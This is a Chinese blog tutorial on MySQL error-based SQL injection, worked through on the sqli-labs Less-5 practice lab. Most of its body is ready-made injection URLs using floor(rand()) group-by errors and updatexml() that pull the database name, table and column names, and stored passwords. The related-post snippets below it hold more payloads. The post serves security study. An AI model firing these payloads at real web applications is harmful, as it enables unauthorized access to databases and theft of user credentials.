Mysql注入 -- 报错注入

最新推荐文章于 2024-05-24 15:55:04 发布
最新推荐文章于 2024-05-24 15:55:04 发布
阅读量745 收藏 5
点赞数
分类专栏: MySQL注入 文章标签: Mysql 报错注入 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41489908/article/details/117062098
版权

​时刻清零,不要老把自己的一套拿出来。。。

----  网易云热评

一、常用函数

1、count();统计该列有几条数据

2、rand():产生0-1随机数

3、group by:根据某一列排序,改列必须出现在前面查询的内容

4、floor(1.23):获取小于等于该值的最大整数

5、as:给查询的列名内容重命名

6、concat(1,2,3):将里面的内容连接在一起

二、实例演示

1、获取当前数据库名称

http://192.168.139.129/sqli/Less-5/?id=1' union select 1,count(*),concat((select database()),"******",floor(rand(0)*2)) as aiyou from information_schema.tables  group by aiyou --+

2、获取数据库security的表名

http://192.168.139.129/sqli/Less-5/?id=1' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),"******",floor(rand(0)*2)) as aiyou from information_schema.tables  group by aiyou --+  第一个表http://192.168.139.129/sqli/Less-5/?id=1' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 3,1),"******",floor(rand(0)*2)) as aiyou from information_schema.tables  group by aiyou --+  第三个表

3、获取表users的字段名,将user转为十六进制,引号带入会引发语句错误

http://192.168.139.129/sqli/Less-5/?id=1' union select 1,count(*),concat((select column_name from information_schema.columns where table_name=0x7573657273 and table_schema=database() limit 1,1),"******",floor(rand(0)*2)) as aiyou from information_schema.tables  group by aiyou --+ 第二列usernamehttp://192.168.139.129/sqli/Less-5/?id=1' union select 1,count(*),concat((select column_name from information_schema.columns where table_name=0x7573657273 and table_schema=database() limit 2,1),"******",floor(rand(0)*2)) as aiyou from information_schema.tables  group by aiyou --+ 第三列password

4、获取字段password的内容

http://192.168.139.129/sqli/Less-5/?id=1' union select 1,count(*),concat((select password from users limit 0,1),"******",floor(rand(0)*2)) as aiyou from information_schema.tables  group by aiyou --+ 第一个内容http://192.168.139.129/sqli/Less-5/?id=1' union select 1,count(*),concat((select password from users limit 1,1),"******",floor(rand(0)*2)) as aiyou from information_schema.tables  group by aiyou --+ 第二个内容

三、函数报错

1、updatexml:updatexml的第二个参数需要Xpath格式的字符串,concat()函数为字符串连接函数显然不符合规则,但是会将括号内的执行结果以错误的形式报出,这样就可以实现报错注入了

2、获取数据库名称

http://192.168.139.129/sqli/Less-5/?id=1' and 1=(updatexml(1,concat(0x2a,(select database()),0x2a,0x2a),1)) --+

3、获取数据库security的表名

http://192.168.139.129/sqli/Less-5/?id=1' and 1=(updatexml(1,concat(0x2a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x2a,0x2a),1)) --+http://192.168.139.129/sqli/Less-5/?id=1' and 1=(updatexml(1,concat(0x2a,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x2a,0x2a),1)) --+

4、获取表users的字段名,将user转为十六进制,引号带入会引发语句错误

http://192.168.139.129/sqli/Less-5/?id=1' and 1=(updatexml(1,concat(0x2a,(select column_name from information_schema.columns where table_name=0x7573657273 and table_schema=database() limit 1,1),0x2a,0x2a),1)) --+http://192.168.139.129/sqli/Less-5/?id=1' and 1=(updatexml(1,concat(0x2a,(select column_name from information_schema.columns where table_name=0x7573657273 and table_schema=database() limit 2,1),0x2a,0x2a),1)) --+

5、获取字段password的内容

http://192.168.139.129/sqli/Less-5/?id=1' and 1=(updatexml(1,concat(0x2a,(select password from users limit 0,1),0x2a,0x2a),1)) --+http://192.168.139.129/sqli/Less-5/?id=1' and 1=(updatexml(1,concat(0x2a,(select password from users limit 3,1),0x2a,0x2a),1)) --+

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

欢迎关注视频号:之乎者也吧

web安全工具库
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
MYSQL报错注入
聚鼎安全
01-08 3286
目录审计思路报错语句报错函数查询表floor报错函数讲解报错原理语句xpath语法报错函数讲解语句整数溢出报错exppowcot列名重复报错name_constjoin using几何函数报错不存在函数报错 审计思路 代码中带入查询的参数没有经过任何过滤并产生报错,具有报错信息提示,就可以用报错查询。 常用报错检测符号:’ \ ; %00 ) ( # " 报错函数通常尤其最长报错输出的限制,面对这种情况,可以进行分割输出。 特殊函数的特殊参数进运行一个字段、一行数据的返回,使用group_c
MySQL报错注入
yuan_boss的博客
08-23 2178
触发报错的方式有很多,具体细节也不尽相同。注意:通过concat()函数拼接的字符串长度只有31位,所以需要借助substr对结果进行截取,然后通过替换截取的下标来获取所有信息。领取地址:链接:https://pan.baidu.com/s/1OeEMML4GRCsbC4LpQK9KoA?cms靶场中具有sql注入的地址:http://localhost/cms/cms/show.php?​ 在注入点的判断过程中,发现数据库中SQL 语句的报错信息,会显示在页面中,因此可以利用报错信息进行注入
Mysql注入详细讲解
最新发布
2401_84466359的博客
05-24 1053
*原理:**用户向数据库里存入恶意的数据,在数据被插入到数据库之前,肯定会对数据库进行转义处理,但用户输入的数据的内容肯定是一点摸样也不会变的存进数据库里,而一般都默认为数据库里的信息都是安全的,查询的时候不会进行处理,所以当用户的恶意数据被web程序调用的时候就有可能出发SQL注入。GET/POST提交数据时,发现提交的数据被加密了(可能js加密),那么在提交数据前,抓包,解密,将注入语句写好,然后将整个语句进行加密(相同加密算法),再将数据发过去。HTTP 头注入常常发生在程序采集用户信息的模块中。
SQL注入MYSQL注入总结-20240517更新mysql报错注入函数
qq_39764475的博客
08-12 2144
简介 information_schema是用于存储数据库元数据的表,它保存了数据库名,表名,列名等信息。 让我们从爆破表名到了可以直接查询。 information_schema是MySQL5.0以上数据库独有,MYSQL4.X的没有,只能进行对库名、表名、列名暴力破解。 基本使用 基本语法 1.建立数据库 mysql> create database mysqltest; Query OK, 1 row affected (0.00 sec) 2.查询所有数据库 mysql> show d
MySQL 报错注入
Risk2S的小博客
05-20 1386
利用数据库报错来显示数据的注入方式。通常注入的sql语句一般是“select * from 表 where 参数=值” ①: floor() 注入语句: id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2)) x from information_schema.table
mysql 报错注入语句_mysql注入
weixin_42165583的博客
02-01 290
SQL的注入类型有以下5种:Boolean-based blind SQL injection(布尔型注入)Error-based SQL injection(报错注入)UNION query SQL injection(可联合查询注入)Stacked queries SQL injection(可多语句查询注入)Time-based blind SQL injection(基于时间延迟注入)u...
web-报错注入-皮卡丘靶场
07-15
报错注入】是一种安全漏洞,它发生在攻击者能够通过输入特定的数据,导致应用程序返回关于其内部结构或数据库状态的错误信息。这种错误信息可以揭示敏感信息,如数据库名称、表名、列名,甚至数据本身,从而为攻击...
MySQL五种报错注入1
08-04
MySQL五种报错注入是一种利用数据库的错误反馈信息来获取敏感数据的技术,通常在网站存在SQL注入漏洞时被攻击者利用。以下将详细介绍这些方法: 1. **数据库版本暴露** 利用`information_schema.tables`系统表和`...
10-sql注入-mysql注入1
08-03
MySQL注入是其中一种,特别针对使用MySQL数据库的应用。本文将深入探讨MySQL注入的原理、常见攻击手段以及防范措施。 1. **SQL注入原理**: 当应用程序将用户提供的数据直接拼接到SQL查询中而不进行适当验证时,就...
MYSQL updatexml()函数报错注入解析
09-09
这个函数在处理XML数据时非常有用,但同时也可能成为安全漏洞的来源,特别是在没有正确过滤用户输入的情况下,可能导致SQL报错注入。 `updatexml()`函数的基本语法如下: ```sql UPDATEXML(XML_document, XPath_...
mysql报错注入_mysql报错注入
weixin_29214335的博客
01-13 257
报错注入这里主要介绍3种MySQL数据库报错注入的发法,分别是updatexml、floor和exp。1.updatexmlupdatexml的报错原理从本质上来说就是函数的报错。selectupdatexml(1,concat(0x7e,(select version()),0x7e),1);这里还是使用前面的例子,举出一个爆破数据库版本的样例Payload:爆破数据库版本信息?id=1' +...
mysql 报错注入语句_mysql 报错注入语句
weixin_42548961的博客
01-19 239
'-(SELECT*FROM(SELECT name_const(version(),1),name_const(version(),1))a)#'=0 group by elt(rand(),version())having sum(0)#'-updatexml(0,repeat(version(),2),2)#'|polygon((select*from(select name_const(v...
SQL注入报错注入
qq_68163788的博客
01-27 2013
QL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入中注入恶意的SQL代码来执行未经授权的数据库操作。报错注入是一种SQL注入的类型,它利用数据库在执行恶意SQL语句时产生的错误消息来获取有关数据库结构和数据的信息。 假设有一个使用用户输入构建SQL查询的应用程序。攻击者可以通过在输入中注入恶意的SQL代码来触发数据库错误,并从错误消息中获取有关数据库的信息,如表名、列名等。这些信息可以帮助攻击者进一步利用数据库。
sql注入基础-mysql报错注入
Redredredfish的博客
12-09 964
mysql报错注入原理常用函数updatexml()extractvalue()count()、floor、rand()、group by不太常用函数expgeometrycollection 原理 当联合注入无法回显时,可以利用报错回显,同时查询指令或者SQL函数会被执行,报错的过程可能会出现在查询或者插入甚至删除的过程中。 条件: 查询语句会被执行 报错信息有回显 常用函数 updatexml() updatexml(目标xml内容,xml文档路径,更新的内容) 当参数2xml文档路径包含字符~,会
sql注入报错注入
2401_82760239的博客
04-02 1384
报错注入就是利用率数据库的某些机制,人为的制造错误条件,使得查询结果能够出现在错误的信息中。
SQL注入mysql显错注入
weixin_34060741的博客
11-12 857
在我们实际渗透中,明明发现一个注入点,本以为丢给sqlmap就可以了,结果sqlmap只显示确实是注入点,但是数据库却获取不了,如图1所示,这时我们可以使用手工进行注入,判断出过滤规则以及基本过滤情况,然后再选择对应的sqlmap脚本(如果有的话),本文主要是讲述如何通过mysql函数报错来进行注入,另外如何使用手工进行全程注入的利用过程,如果你...
新型mysql报错注入
xiaoshan812613234的专栏
08-12 1174
新型mysql报错注入,这种报错注入主要是基于mysql中无符号int数据类型的溢出: 1.查询数据库版本: select 2*(if((select 8 from (select (version()))s),18446744073709551610, 18446744073709551610));=select 1E308*if((select * from (select version
mysql报错注入_MYSQL报错注入的一点总结
weixin_31965935的博客
12-23 223
SQL报错注入就是利用数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。这种手段在联合查询受限且能返回错误信息的情况下比较好用,毕竟用盲注的话既耗时又容易被封。MYSQL报错注入个人认为大体可以分为以下几类:BIGINT等数据类型溢出xpath语法错误concat+rand()+group_by()导致主键重复一些特性下面就针对这几种错误类型看看背后的原理是怎样的。0x01 ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值